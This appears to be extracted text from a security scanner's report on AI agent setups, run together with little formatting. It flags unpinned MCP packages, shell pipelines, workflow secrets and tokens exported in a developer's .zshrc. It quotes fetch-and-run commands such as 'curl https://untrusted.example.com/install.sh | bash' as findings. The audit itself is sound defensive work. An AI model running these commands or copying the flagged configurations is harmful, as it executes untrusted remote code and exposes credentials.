No multi-finding attack chains correlated.
GITHUB_TOKEN=<redacted:github-token>
${KEYCHAIN:foo}) or environment variable that's set at runtime, not in the JSON/TOML.
PROD_DATABASE_URL=<redacted:url-credentials>db.acme.com/prod
npx -y @modelcontextprotocol/server-filesystem /tmp without a pinned package version. The package can change between runs, exposing the agent to supply-chain risk.npx -y @modelcontextprotocol/server-filesystem /tmp
"args": ["-y", "@modelcontextprotocol/server-filesystem@1.2.3"].
npx -y @modelcontextprotocol/server-github without a pinned package version. The package can change between runs, exposing the agent to supply-chain risk.npx -y @modelcontextprotocol/server-github
"args": ["-y", "@modelcontextprotocol/server-github@1.2.3"].
bash -c or a shell pipeline. This widens attack surface (arbitrary command injection) and bypasses argument-level review.bash -c node /opt/server.js | tee /tmp/log
bash -c indirection.
sh -c curl https://internal.example.com/agent.js | node
bash -c or a shell pipeline. This widens attack surface (arbitrary command injection) and bypasses argument-level review.sh -c curl https://internal.example.com/agent.js | node
bash -c indirection.
ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
GITHUB_TOKEN exposure to autonomous code-changing agents.
DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}
GITHUB_TOKEN exposure to autonomous code-changing agents.
permissions: write-all at workflow level grants the GITHUB_TOKEN maximum scope for the duration of the run. A compromised step has full repo write + secret read.permissions: write-all
permissions: { contents: read, pull-requests: write }).
~/laptops/dev-machine-12/.zshrc exports GH_TOKEN with a value matching a known credential pattern. Any agent or process inheriting the user's shell environment receives this credential.GH_TOKEN=<redacted:github-token>
~/laptops/dev-machine-12/.zshrc exports AWS_ACCESS_KEY_ID with a value matching a known credential pattern. Any agent or process inheriting the user's shell environment receives this credential.AWS_ACCESS_KEY_ID=<redacted:aws-access-key>
~/laptops/dev-machine-12/.zshrc exports ANTHROPIC_API_KEY with a value matching a known credential pattern. Any agent or process inheriting the user's shell environment receives this credential.ANTHROPIC_API_KEY=<redacted:anthropic-key>
curl https://untrusted.example.com/install.sh | bash